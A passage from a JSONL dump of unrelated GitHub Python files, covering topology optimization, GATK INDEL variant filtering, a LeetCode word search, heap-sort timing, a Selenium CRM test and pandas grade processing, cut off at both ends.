np.float_(columns)\n\t\tdata.append(source)\n\n\tfi.close()\n\n\tdata=np.asarray(data)\n\n\t#dd=np.where(data>10)\n\tcf_t.append(np.mean(data))\n\nfdata={'cf_t':cf_t,'time_t':time_t}\n#with open('data.txt','w') as 
outfile:\n#\tjson.dump(fdata,outfile)\n\n#fdata={'data':data}\nnp.save('cf.npy',fdata)\n\n#read_dict=np.load('my_file.npy').item()\n#data_sav=read_dict['data']\n\n#date1 = datetime.datetime(2014, 1, 1)\n#date2 = datetime.datetime(2016, 1, 1)\n#delta = datetime.timedelta(weeks=4)\n#dates = drange(date1, date2, delta)\nexit()\nx = range(len(time_t))\n\nwith plt.style.context('fivethirtyeight'):\n plt.plot(x, light_t)\n plt.plot(x, ct_t)\n\nprint(light_t)\nprint(ct_t)\n#line, = plt.plot(x, y, '--', linewidth=2)\n\nplt.show()\n\n","repo_name":"karrey05/Team","sub_path":"viirs/timeses/read_asc_cf.py","file_name":"read_asc_cf.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9509391507","text":"'''\nClass env_ke provide objects for buiding environments, which load and agent\ntopology optimization by MAS\n\n2D only for now\n'''\nimport time\nimport numpy as np\nimport math\nfrom scipy.sparse import coo_matrix\n\nimport suFuncStack \nfrom suAI.misc import debug\nfrom suAI.mas import agent\nfrom suAI.misc import Qtrac\nfrom suAI.ke.ke import KnowledgeEngineBase\nfrom pyknow import *\n\nimport concurrent.futures\n\nfrom random import choice\nif __name__ == \"__main__\":\n from loads import HalfBeam\n from constraints import DensityConstraint\n from fesolvers import LilFESolver, CooFESolver \n \n \n \n\n\n####################\n# ActionPool # \n#################### \nclass ActionPool(object):\n def __init__(self):\n pass\n def set_parent(self, parent):\n self.parent = parent\n def add_func(self, func):\n f = classmethod(func)\n setattr(self, 'ACT_'+func.__name__, func)\n def get_acts(self):\n func_list = dir(self)\n func_list = [i for i in func_list if i[:4]==\"ACT_\"]\n return func_list\n def run(self, method_name, pos):\n return getattr(self, \"ACT_\"+method_name)(pos) \n \n####################\n# Actions # \n#################### \n# action: to be added into ActionPool()\ndef increase_density(x): \n move = 0.03 \n xnew = x + move \n xnew = np.maximum(0, np.minimum(1.0, xnew)) \n return xnew\n \n# action: to be added into ActionPool()\ndef decrease_density(x): \n move = 0.03 \n xnew = x - move \n xnew = np.maximum(0, np.minimum(1.0, xnew)) \n return xnew\n\n##########\n# KE #\n##########\nclass ke_mas(KnowledgeEngineBase, KnowledgeEngine):\n ''' \n 1. Hold an knowlege base (eg. rules and facts) for MAS based evolution\n 2. 
Help agents to make a decision.\n '''\n def __init__(self):\n KnowledgeEngineBase.__init__(self)\n KnowledgeEngine.__init__(self)\n \n def reset(self):\n super().reset()\n self.answers = []\n \n @DefFacts()\n def __init_facts(self):\n yield(Fact(method='mas'))\n return\n \n ## dc > 0.4 -> \n @Rule (Fact(dc = MATCH.dc),\n TEST(lambda dc: dc > 0.4)\n )\n def increase_density(self):\n self.answers.append('increase_density')\n \n @Rule (Fact(dc = MATCH.dc),\n TEST(lambda dc: dc <= 0.4)\n )\n def decrease_density(self):\n self.answers.append('decrease_density')\n \n def add_facts(self, facts):\n self.declare(*facts)\n \n \n def status(self):\n print(self.facts)\n\n\n###################################################\n# Global variable for parallel computing #\n###################################################\nenv = None\nacts = None\n\nacts = ActionPool()\nacts.add_func(decrease_density)\nacts.add_func(increase_density) \n\n\ndef timer(func):\n def wraper(*args, **kargs):\n start_time = time.perf_counter()\n f = func(*args, **kargs)\n end_time = time.perf_counter()\n print('Done in {} seconds'.format(end_time - start_time)) \n return f\n return wraper\n\n# parallel processing method \ndef col_agents_act(col_idx, col_x, col_dc):\n '''\n Deal with each sub columns\n ''' \n ke = ke_mas()\n for i in range(len(col_x)): \n f = Fact(dc = float(col_dc[i]))\n fs = []\n fs.append(f)\n ke.reset()\n ke.add_facts(fs) \n ke.run()\n for func in ke.answers:\n col_x[i] = acts.run(func,col_x[i]) \n \n return col_idx, col_x\n\ndef update_parallel(env, constraint):\n #volfrac = constraint.volume_frac()\n #env.xmin = constraint.density_min()\n #env.xmax = constraint.density_max() \n \n futures = set() \n data = []\n with concurrent.futures.ProcessPoolExecutor(max_workers=8) as executor:\n for idx_col, col_x, col_dc in get_jobs(env):\n future = executor.submit(col_agents_act, idx_col, col_x, col_dc) \n futures.add(future)\n data = wait_for(futures, env)\n \n return env.combine_data(data)\n\ndef get_jobs(env):\n dc_cols = env.divide_data(env.dc)\n x_cols = env.divide_data(env.x)\n for idx_col in range(len(dc_cols)):\n yield idx_col, x_cols[idx_col].flatten(), dc_cols[idx_col].flatten()\n\n\ndef wait_for(futures, env):\n canceled = False \n data = {}\n for future in concurrent.futures.as_completed(futures):\n err = future.exception()\n if err is None:\n result = future.result()\n #col_idx_arr += [result.col_idx]\n #ata += result.col_data\n data[result[0]] = result[1]\n #print(result)\n \n elif isinstance(err, TypeError):\n Qtrac.report(str(err), True)\n else:\n raise err # Unanticipated\n return data \n\n###################\n# Environment #\n################### \nclass Environment(object):\n \n '''\n young: young's modulus\n poisson: poisson ratio\n '''\n def __init__(self, fesolver, young = 1, poisson = 0.3, verbose = False):\n self.convergence = suFuncStack.convergence(3)\n self.fesolver = fesolver\n self.young = young\n self.poisson = poisson\n self.dim = 2\n self.verbose = verbose\n self.x = []\n self.agts = {}\n self.func_pool = ActionPool()\n self.func_pool.set_parent(self) \n \n # test action adding \n self.func_pool.add_func(decrease_density)\n self.func_pool.add_func(increase_density) \n \n def divide_data(self, m):\n '''\n dividing matrix into columns\n return list of np.ndarray\n '''\n nely, nelx = m.shape\n X = np.split(m, nelx, axis=1)\n return X\n \n def combine_data(self, data):\n '''\n combining columns into matrix\n notice the input col in data is 1d array\n '''\n if len(data) < 1:\n return []\n m 
= np.vstack(data[0])\n \n for i in range(1,len(data)):\n m = np.concatenate((m, np.vstack(data[i]) ), axis=1)\n \n return m\n \n def run(self, load, constraint, x, penal, rmin, delta, loopy, history = False): \n loop = 0 # number of loop iterations\n change = 1.0 # maximum density change from prior iteration\n self.load = load\n self.constraint = constraint\n self.convergence.add_data(x)\n self.H, self.Hs = self.pre_filter(x, rmin)\n \n if history:\n x_history = [x.copy()]\n\n while (not self.convergence.is_convergence()) and (loop < loopy):\n loop = loop + 1\n x, u = self.iter(load, constraint, x, penal, rmin) \n self.convergence.add_data(x)\n if self.verbose: print('iteration ', loop, ', change ', self.convergence.listy[-1], flush = True)\n if history: x_history.append(x.copy())\n \n if history:\n return x, x_history\n else:\n return x, loop\n \n # initialization\n def init(self, load, constraint):\n (nelx, nely) = load.shape()\n # mean density\n self.x = np.ones((nely, nelx))*constraint.volume_frac() \n \n return self.x\n\n # iteration\n def iter(self, load, constraint, x, penal, rmin):\n\n xold = x.copy()\n\n # element stiffness matrix\n ke = self.lk(self.young, self.poisson)\n\n # displacement via finite element analysis\n u = self.fesolver.displace(load, x, ke, penal)\n\n # compliance and derivative\n c, dc = self.comp(load, x, u, ke, penal)\n\n # filter\n #dc = self.filt(x, rmin, dc)\n self.dc = self.fast_filt(x,dc,self.H, self.Hs)\n # update\n x = self.update(x, constraint)\n\n # how much has changed?\n change = np.amax(abs(x-xold))\n return x, u\n \n # compliance and its derivative\n def comp(self, load, x, u, ke, penal):\n c = 0\n dc = np.zeros(x.shape)\n\n nely, nelx = x.shape\n for ely in range(nely):\n for elx in range(nelx):\n ue = u[load.edofOld(elx, ely, nelx, nely)]\n ce = np.dot(ue.transpose(), np.dot(ke, ue))\n c = c + (x[ely,elx]**penal)*ce\n dc[ely,elx] = -penal*(x[ely,elx]**(penal-1))*ce\n\n return c, dc\n\n def pre_filter(self, x, rmin):\n rminf = round(rmin)\n nely, nelx = x.shape\n nfilter=int(nelx * nely * ((2 * rminf + 1)** 2)) \n iH = np.zeros(nfilter)\n jH = np.zeros(nfilter)\n sH = np.zeros(nfilter)\n cc = 0\n for i in range(nelx):\n for j in range(nely):\n row=i*nely+j #index order is the same as that for elements \n for k in range(max(i-rminf, 0), min(i+rminf+1, nelx)):\n for l in range(max(j-rminf, 0), min(j+rminf+1, nely)): \n col = k*nely+l #index order is the same as that for elements\n weight = max(0, rmin - np.sqrt((i-k)**2+(j-l)**2));\n iH[cc] = row\n jH[cc] = col\n sH[cc] = weight\n cc += 1\n H=coo_matrix((sH,(iH,jH)),shape=(nelx*nely,nelx*nely)).todense()\n Hs = H.sum(1) \n \n return H, Hs\n \n def fast_filt(self,x, dc, H, Hs): \n nely,nelx = x.shape\n s = nely*nelx\n x_col = x.flatten('F').reshape([s,1]) \n dc_col = dc.flatten('F').reshape([s,1])\n \n xdc = x_col * dc_col \n dcf = np.dot(H,xdc)/np.multiply(Hs, x_col)\n dc = dcf.reshape([nely,nelx], order='F')\n return dc\n \n # filter\n def filt(self, x, rmin, dc):\n rminf = round(rmin)\n\n dcn = np.zeros(x.shape)\n nely, nelx = x.shape\n\n for i in range(nelx):\n for j in range(nely):\n sum = 0.0\n for k in range(max(i-rminf, 0), min(i+rminf+1, nelx)):\n for l in range(max(j-rminf, 0), min(j+rminf+1, nely)):\n weight = max(0, rmin - math.sqrt((i-k)**2+(j-l)**2));\n sum = sum + weight;\n dcn[j,i] = dcn[j,i] + weight*x[l,k]*dc[l,k];\n \n dcn[j,i] = dcn[j,i]/(x[j,i]*sum);\n\n return dcn\n \n \n def update(self, x, constraint):\n self.x = x \n m = np.abs(self.dc)\n m = m / np.max(m)\n self.dc = 
np.asarray(m)\n \n x = update_parallel(self, constraint) \n \n return x\n \n \n # element (local) stiffness matrix\n def lk(self, young, poisson):\n e = young\n nu = poisson\n k = np.array([1/2-nu/6,1/8+nu/8,-1/4-nu/12,-1/8+3*nu/8,-1/4+nu/12,-1/8-nu/8,nu/6,1/8-3*nu/8])\n ke = e/(1-nu**2)* \\\n np.array([ [k[0], k[1], k[2], k[3], k[4], k[5], k[6], k[7]],\n [k[1], k[0], k[7], k[6], k[5], k[4], k[3], k[2]],\n [k[2], k[7], k[0], k[5], k[6], k[3], k[4], k[1]],\n [k[3], k[6], k[5], k[0], k[7], k[2], k[1], k[4]],\n [k[4], k[5], k[6], k[7], k[0], k[1], k[2], k[3]],\n [k[5], k[4], k[3], k[2], k[1], k[0], k[7], k[6]],\n [k[6], k[3], k[4], k[1], k[2], k[7], k[0], k[5]],\n [k[7], k[2], k[1], k[4], k[3], k[6], k[5], k[0]] ]);\n\n return ke\n\n\n\n\n \nif __name__ == \"__main__\": \n \n # loading/problem\n nelx = 15\n nely = 5\n penal = 3.0\n rmin = 7.5\n\n delta = 0.02\n loopy = 10#math.inf \n load = HalfBeam(nelx, nely)\n\n # parallel optimizer testing\n verbose = True\n fesolver = CooFESolver(verbose = verbose)\n \n optimizer = None\n density_constraint = None \n \n # material properties\n young = 1\n poisson = 0.6 \n \n optimizer = Environment(fesolver, young, poisson, verbose = verbose)\n # constraints\n density_constraint = DensityConstraint(volume_frac = 1.0, density_min = 0, density_max = 1) \n \n # statistic time\n start_time = time.perf_counter()\n # compute\n history = True\n x = optimizer.init(load, density_constraint)\n x, x_more = optimizer.run(load, density_constraint, x, penal, rmin, delta, loopy, history)\n end_time = time.perf_counter()\n print('Processed {} elements in {} seconds'.format(nelx*nely, end_time - start_time)) \n \n \n \n \n \n","repo_name":"fly2mars/suMasTo","sub_path":"src/env_ke_parallel.py","file_name":"env_ke_parallel.py","file_ext":"py","file_size_in_byte":12582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28820589462","text":"#George Marchment + Clemence Sebe\n#Script Filtration INDEL\nimport os\nimport variables as v\n\n\n#Function that extrats the INDELs and filters them using the filters set in main.py\ndef mainFiltrationINDEL(telechargementFiltreINDEL, sansFiltre, avecFiltre, filtre):\n\tprint(\"DEBUT SCRIPT FILTRATION INDEL\")\n\tcurrent_path= os.getcwd()\n\t\n #We recuperate the filters\n\tqd= filtre['QD'][1]\n\tmq= filtre['MQ'][1]\n\tmqRankSumInf= filtre['MQRankSumInf'][1]\n\tmqRankSumSup= filtre['MQRankSumSup'][1]\n\treadPosRankSumInf= filtre['ReadPosRankSumInf'][1]\n\treadPosRankSumSup= filtre['ReadPosRankSumSup'][1]\n\tsor= filtre['SOR'][1]\n\n\t#We recuperate the comparaisons symbols for the filters \n\tsym_qd= filtre['QD'][0]\n\tsym_mq= filtre['MQ'][0]\n\tsym_mqRankSumInf= filtre['MQRankSumInf'][0]\n\tsym_mqRankSumSup= filtre['MQRankSumSup'][0]\n\tsym_readPosRankSumInf= filtre['ReadPosRankSumInf'][0]\n\tsym_readPosRankSumSup= filtre['ReadPosRankSumSup'][0]\n\tsym_sor= filtre['SOR'][0]\n \n\t#We set the filters to give to gatk VariantFiltration\n\tfiltre_qd= \" --filter-name \\'QD\"+str(qd)+\"\\' --filter-expression \\\"QD\"+sym_qd+str(qd)+\"\\\"\"\n\tfiltre_mq= \" --filter-name \\'MQ\"+str(mq)+\"\\' --filter-expression \\\"MQ\"+sym_mq+str(mq)+\"\\\"\"\n\tfiltre_mqRankSumInf= \" --filter-name \\'MQRankSumInf\"+str(mqRankSumInf)+\"\\' --filter-expression \\\"MQRankSumInf\"+sym_mqRankSumInf+str(mqRankSumInf)+\"\\\"\"\n\tfiltre_mqRankSumSup= \" --filter-name \\'MQRankSumSup\"+str(mqRankSumSup)+\"\\' --filter-expression 
\\\"MQRankSumSup\"+sym_mqRankSumSup+str(mqRankSumSup)+\"\\\"\"\n\tfiltre_readPosRankSumInf= \" --filter-name \\'ReadPosRankSumInf\"+str(readPosRankSumInf)+\"\\' --filter-expression \\\"ReadPosRankSumInf\"+sym_readPosRankSumInf+str(readPosRankSumInf)+\"\\\"\"\n\tfiltre_readPosRankSumSup= \" --filter-name \\'ReadPosRankSumSup\"+str(readPosRankSumSup)+\"\\' --filter-expression \\\"ReadPosRankSumSup\"+sym_readPosRankSumSup+str(readPosRankSumSup)+\"\\\"\"\n\tfiltre_sor= \" --filter-name \\'SOR\"+str(sor)+\"\\' --filter-expression \\\"SOR\"+sym_sor+str(sor)+\"\\\"\"\n\t\n\tfiltres= filtre_qd+ filtre_mq+ filtre_mqRankSumInf+ filtre_mqRankSumSup+ filtre_readPosRankSumInf+ filtre_readPosRankSumSup+ filtre_sor\n\n\tif telechargementFiltreINDEL:\n\t\t#We select the INDELs \n\t\tcmd = \"gatk SelectVariants -R \" + v.geneRefDossier + \"S288C_reference_sequence_R64-2-1_20150113.fasta\" + \" -V \" + v.vcf + \"output.vcf.gz --select-type-to-include INDEL -O \" + v.vcf + \"INDEL/outputINDEL.vcf.gz\"\n\t\tos.system(cmd)\n\t\t\n\t\t#Without Filter\n\t\tif(sansFiltre):\n\t\t\t#Extract the data wanted (POS, QD ect..)\n\t\t\tcmd = \"bcftools query \" + v.vcf + \"INDEL/outputINDEL.vcf.gz -f '%CHROM\\t%POS\\t%REF\\t%ALT\\t%QD\\t%FS\\t%MQ\\t%MQRankSum\\t%ReadPosRankSum\\t%SOR\\t%DP\\t%FILTER\\n' > \" + v.vcf + \"INDEL/PRE_FILTRE/outputIndelNoFiltrer.txt\"\n\t\t\tos.system(cmd)\n \n\t\t\t#Addition legend to the first line \n\t\t\tcmd = \"sed -i '1iCHROM\\tPOS\\tREF\\tALT\\tQD\\tFS\\tMQ\\tMQRankSum\\tReadPosRankSum\\tSOR\\tDP\\tFILTER\\n' \" + v.vcf + \"INDEL/PRE_FILTRE/outputIndelNoFiltrer.txt\"\n\t\t\tos.system(cmd)\t\n\n\t\t#With filter\n\t\tif(avecFiltre):\n \t\t#Set filters\n\t\t\tcmd = \"gatk VariantFiltration -R \" + v.geneRefDossier + \"S288C_reference_sequence_R64-2-1_20150113.fasta -V \" + v.vcf + \"INDEL/outputINDEL.vcf.gz -O \" + v.vcf + \"INDEL/POST_FILTRE/outputIndelFiltrer.vcf.gz\"+filtres\n\t\t\tos.system(cmd)\n\t\t\t\n\t\t\t#Extract the data wanted (POS, QD ect..)\n\t\t\tcmd = \"bcftools query \" + v.vcf + \"INDEL/POST_FILTRE/outputIndelFiltrer.vcf.gz -f '%CHROM\\t%POS\\t%REF\\t%ALT\\t%QD\\t%FS\\t%MQ\\t%MQRankSum\\t%ReadPosRankSum\\t%SOR\\t%DP\\t%FILTER\\n' > \" + v.vcf + \"INDEL/POST_FILTRE/outputIndelFiltrer.txt\"\n\t\t\tos.system(cmd)\t\n\t\t\t\n\t\t\t#Addition legend to the first line \n\t\t\tcmd = \"sed -i '1iCHROM\\tPOS\\tREF\\tALT\\tQD\\tFS\\tMQ\\tMQRankSum\\tReadPosRankSum\\tSOR\\tDP\\tFILTER' \" + v.vcf + \"INDEL/POST_FILTRE/outputIndelFiltrer.txt\"\n\t\t\tos.system(cmd)\n\n\t\t\n\tprint(\"FIN SCRIPT FILTRATION INDEL\")\n","repo_name":"George-Marchment/Projet-Bioinformatique-L3","sub_path":"filtrationINDEL.py","file_name":"filtrationINDEL.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22442397797","text":"#\n# [79] Word Search\n#\n# https://leetcode.com/problems/word-search/description/\n#\n# algorithms\n# Medium (29.55%)\n# Total Accepted: 228.7K\n# Total Submissions: 773.8K\n# Testcase Example: '[[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]]\\n\"ABCCED\"'\n#\n# Given a 2D board and a word, find if the word exists in the grid.\n#\n# The word can be constructed from letters of sequentially adjacent cell, where\n# \"adjacent\" cells are those horizontally or vertically neighboring. 
The same\n# letter cell may not be used more than once.\n#\n# Example:\n#\n#\n# board =\n# [\n# ⁠ ['A','B','C','E'],\n# ⁠ ['S','F','C','S'],\n# ⁠ ['A','D','E','E']\n# ]\n#\n# Given word = \"ABCCED\", return true.\n# Given word = \"SEE\", return true.\n# Given word = \"ABCB\", return false.\n#\n#\n#\nimport copy\n\nclass Solution:\n def is_valid(self, board, pos):\n r,c = pos\n if 0 <= r < len(board) and 0 <= c < len(board[0]):\n return True\n return False\n\n def helper(self, board, avail, pos, word, idx, results):\n letter = word[idx]\n r,c = pos\n if avail[r][c] and letter == board[r][c]:\n idx += 1\n if idx == len(word):\n results.append(True)\n return\n avail[r][c] = False\n if self.is_valid(board, (r-1,c)):\n new_avail = copy.deepcopy(avail)\n self.helper(board, new_avail, (r-1,c), word, idx+1, results)\n if self.is_valid(board, (r+1,c)):\n new_avail = copy.deepcopy(avail)\n self.helper(board, new_avail, (r+1,c), word, idx+1, results)\n if self.is_valid(board, (r,c-1)):\n new_avail = copy.deepcopy(avail)\n self.helper(board, new_avail, (r,c-1), word, idx+1, results)\n if self.is_valid(board, (r,c+1)):\n new_avail = copy.deepcopy(avail)\n self.helper(board, new_avail, (r,c+1), word, idx+1, results)\n return\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n avail = [[True for col in row] for row in board]\n idx = 0\n results = list()\n for r in range(len(board)):\n for c in range(len(board[0])):\n self.helper(board, avail, (r,c), word, idx, results)\n return any(results)\n\n","repo_name":"richnakasato/lc","sub_path":"79.word-search.0.python3.py","file_name":"79.word-search.0.python3.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26997146067","text":"#!/usr/bin/python3.8\n# -*- coding: utf-8 -*-\n# @Time : 2020/12/8 14:52\n# @File : test_customers.py\n# @Author : 黄权权\n# @Software: PyCharm\n# @Desc : 环境:自动构造创建已存在客户\nimport time\n\nimport allure\nimport pytest\n\nfrom pylib.UIlib.pageObjects.commonPage import CommonPage\nfrom pylib.UIlib.pageObjects.customersDetailPage import CustomersDetailPage\nfrom pylib.UIlib.pageObjects.signedCustomersPage import SignedCustomersPage\nfrom pylib.UIlib.pageObjects.waitingCustomersPage import WaittingCustomersPage\nfrom utils.tools import read_yaml\n\n\n@allure.epic(\"UI模块-CRM系统\")\n@allure.feature(\"客户管理\")\nclass TestCustomer:\n\n @pytest.fixture()\n def before_test_createCustomer(self, init_customers):\n self.commonPage = init_customers[0]\n self.waittingCustomersPage = init_customers[1]\n self.costomersInfo = init_customers[2]\n yield\n # 刷新页面,退出iframe 或者\n # self.waittingCustomers.switch_to_default_content() 回到默认iframe\n self.waittingCustomersPage.refresh()\n # 关闭待跟客户tab页\n self.commonPage.close_WaittingCustomersPage_tab()\n\n @allure.story(\"客户管理-待跟客户\")\n @allure.title(\"创建客户\")\n # @pytest.mark.skip(\"暂不执行\")\n def test_createCustomer(self, before_test_createCustomer):\n \"\"\"\n 当前账号已有客户,创建一个新的客户\n :return:\n \"\"\"\n # 点击客户管理\n self.commonPage.click_customerManagement()\n # 点击待跟客户\n self.commonPage.click_waittingCustomers()\n # 切换到对应的待跟客户iframe,进行创建客户\n self.commonPage.switch_to_waittingCustomers_iframe()\n # 创建客户\n self.waittingCustomersPage.createCustomers()\n # 创建完毕,自动关闭弹窗,等待3秒,防止弹窗未关闭就进行操作导致失败\n time.sleep(3)\n # 刷新页面,重新进入待跟客户iframe\n self.commonPage.refresh()\n self.commonPage.switch_to_waittingCustomers_iframe()\n # 查找刚创建的客户\n # 获取刚才创建的客户信息\n customersInfo = 
read_yaml(\"configs/createCustomers.yaml\")\n name = customersInfo[\"customersInfo\"][\"name\"]\n # 根据公司名称查找客户\n self.waittingCustomersPage.find_customers(name)\n # 获取查找结果的列表信息\n messages = self.waittingCustomersPage.get_tables_costomersInfo()\n assert name == messages[\"name\"]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Hquanquan/Auto_project_testing_framework","sub_path":"testcase/UI测试用例/用户登录/创建客户/test_customers.py","file_name":"test_customers.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5967352838","text":"totalTicketNumber = 100\r\nmaxTicketNumber = 4\r\npeople = 0\r\n\r\nwhile totalTicketNumber > 0:\r\n ticketNumber = int(input(\"Enter the numbers of ticket that you want to: \"))\r\n if totalTicketNumber <= maxTicketNumber:\r\n maxTicketNumber = totalTicketNumber\r\n if ticketNumber <= maxTicketNumber:\r\n totalTicketNumber -= ticketNumber\r\n print(\"The remaining ticket is %d:\" % totalTicketNumber)\r\n people += 1\r\n else:\r\n print(\"You cant buy more than %d tickets\" % maxTicketNumber)\r\n\r\nprint(\"%d people bought the tickets.\" % people)","repo_name":"mhcekic22/2021_LABS","sub_path":"LAB_05/solution_07.py","file_name":"solution_07.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4442612417","text":"def tekst_ascii_arvudeks(tekst: str) -> str:\n return ' '.join(map(lambda x: str(ord(x)), tekst))\n\n\ndef ascii_arvudest_tekstiks(tekst: str) -> str:\n return ''.join(map(lambda x: chr(int(x)), tekst.split(' ')))\n\n\ndef tekst_ascii_arvudeks_failist(fn: str, fout: str) -> str:\n with open(fn, 'r') as f:\n output = tekst_ascii_arvudeks(f.read())\n with open(fout, 'w') as f:\n f.write(output)\n return output\n\n\ndef ascii_arvudest_tekstiks_failist(fn: str, fout: str) -> str:\n with open(fn, 'r') as f:\n output = ascii_arvudest_tekstiks(f.read())\n with open(fout, 'w') as f:\n f.write(output)\n return output\n\n\ndef display_menu() -> None:\n print('Vali mida tegema:')\n print('\\t1. Arvust tekstiks.')\n print('\\t2. Tekstist arvuks.')\n print('\\t3. Arvust tekstiks. Failid')\n print('\\t4. Tekstist arvuks. Failid')\n print('\\t5. Vaikimisi. 
Näide\\n')\n print('\\t0, q või exit lõpetamiseks.\\n')\n\n\nif __name__ == '__main__':\n while True:\n display_menu()\n user_input = input()\n if user_input in ['0', 'q', 'exit']:\n break\n elif user_input == '1':\n print(ascii_arvudest_tekstiks(input('Palun, sisesta sõne: ')))\n elif user_input == '2':\n print(tekst_ascii_arvudeks(input('Palun, sisesta sõne: ')))\n elif user_input == '3':\n print(ascii_arvudest_tekstiks_failist(\n input('Palun, sisesta sisend faili: '), 'väljund.txt'))\n elif user_input == '4':\n print(tekst_ascii_arvudeks_failist(\n input('Palun, sisesta sisend faili: '), 'väljund.txt'))\n elif user_input == '5':\n print(tekst_ascii_arvudeks_failist(\n 'näide.txt', 'väljund.txt'))\n else:\n print('Palun, sisestage õiget valikud.')\n","repo_name":"Haavi97/opetamiseks","sub_path":"tekst_ascii/tekst_ascii_arvudeks.py","file_name":"tekst_ascii_arvudeks.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40279405737","text":"from common.constant import BASE_URL, X_AUTH_TOKEN\nfrom common.api import Session, Command, Status\n\n\ndef main():\n session = Session(BASE_URL, X_AUTH_TOKEN).start(problem=1)\n while session.status == Status.READY:\n locations = session.get_locations()\n trucks = session.get_trucks()\n session.simulate([\n {'truck_id': 0, 'command': [Command.NOTHING]},\n ])\n print(f\"{session.time}: {session.failed_requests_count}\")\n print(session.get_score())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"heoh/kakao-blind-test-2021-2","sub_path":"api_test.py","file_name":"api_test.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6073376382","text":"import time\ndef heapify(arr, n, i): \n largest = i\n left = 2 * i + 1 \n right = 2 * i + 2 \n \n if left < n and arr[i] < arr[left]: \n largest = left\n \n if right < n and arr[largest] < arr[right]: \n largest = right\n \n # Change root if needed\n if largest != i:\n arr[i],arr[largest] = arr[largest],arr[i] \n \n # Heapify the root. 
\n heapify(arr, n, largest)\n \n# Heap Sort\ndef heapSort(arr): \n n = len(arr) \n for i in range(n // 2 - 1, -1, -1): \n heapify(arr, n, i)\n \n for i in range(n-1, 0, -1): \n # swap the largest item with root node \n arr[i], arr[0] = arr[0], arr[i]\n heapify(arr, i, 0)\n \n# For Array length 2000\na1 = []\nfor i in range(0,2000):\n a1.append(i)\nt1 = time.time()\nheapSort(a1) \nt2 = time.time()\nprint(\"--------------------------------------------------------------------\")\n \nprint(\"Time for array with length 2000 is: \", t2-t1)\n \nprint(\"--------------------------------------------------------------------\")\n \n# For Array length 4000\na2 = []\nfor i in range(0,4000):\n a2.append(i)\nt3 = time.time()\nheapSort(a2)\nt4 = time.time()\n \nprint(\"Time for array with length 4000 is: \", t4-t3)\n \nprint(\"--------------------------------------------------------------------\")\n \n# For array with length 6000\na3 = []\nfor i in range(0,6000):\n a3.append(i)\nt5 = time.time()\nheapSort(a3)\nt6 = time.time()\n \nprint(\"Time for array with length 6000 is: \", t6-t5)\n \nprint(\"--------------------------------------------------------------------\")\n \n# For array with length 8000\na4 = []\nfor i in range(0,8000):\n a4.append(i)\nt7 = time.time()\nheapSort(a4)\nt8 = time.time()\n \nprint(\"Time for array with length 8000 is: \", t8-t7)\n \nprint(\"--------------------------------------------------------------------\")\n \n# For array with length 10000\na5 = []\nfor i in range(0,10000):\n a5.append(i)\nt9 = time.time()\nheapSort(a5)\nt10 = time.time()\n \nprint(\"Time for array with length 10000 is: \", t10-t9)\n","repo_name":"mad003/Sorting-Algos","sub_path":"Python/HeapSort.py","file_name":"HeapSort.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"38119088209","text":"\nimport pandas as pd\nimport numpy as np\nimport glob\nimport os\n\ndef major_drop(df):\n \"\"\"\n major_drop removes the columns specified in the write up\n \"\"\"\n\n columns = [i for i in df.columns if 'Lab' in i]\n columns += [i for i in df.columns if 'Quiz' in i]\n columns += [i for i in df.columns if 'Project' in i]\n columns += [i for i in df.columns if 'Midterm' and 'Lateness' in i]\n columns += [i for i in df.columns if 'Final' and 'Lateness' in i]\n columns += [i for i in df.columns if 'Total Lateness' in i]\n\n columns = list(set(columns))\n df = df.drop(columns, axis=1)\n return df\n\n\ndef merged_exams(df):\n \"\"\"\n major_drop removes the columns specified in the write up\n \"\"\"\n\n df.replace(np.NaN, 0, inplace=True)\n df[\"Midterm Grades\"] = df[\"Midterm V1\"] + df[\"Midterm V2\"] + df[\"Midterm V3\"]\n df[\"Final Grades\"] = df[\"DSC20 Final V2\"] + df[\"DSC20 Final\"]\n a = [\"Midterm V1\", \"Midterm V2\", \"Midterm V3\", \"DSC20 Final\", \"DSC20 Final V2\"]\n df = df.drop(a, axis=1)\n return df\n\n\ndef read_all(dirname):\n \"\"\"\n Finds and reads .csv files from the timeData directory\n \"\"\"\n file = os.listdir(dirname)\n lst = []\n for i in file:\n f = dirname + \"/\" + i\n df = pd.read_csv(f)\n lst.append(df)\n return lst\n\n\ndef extract_and_create(hws):\n \"\"\"\n \"\"\"\n #file = read_all(hws)\n for i in hws:\n i['Lateness (H:M:S)'].replace(np.NaN, '00:00:00', inplace=True)\n\n type_each = []\n master = []\n for i in hws:\n # print(i)\n for j in i['Lateness (H:M:S)']:\n if (j > \"24:00:00\" and j < '48:00:00'):\n type_each.append(2)\n elif (j > \"00:00:00\" and j < \"24:00:00\"):\n 
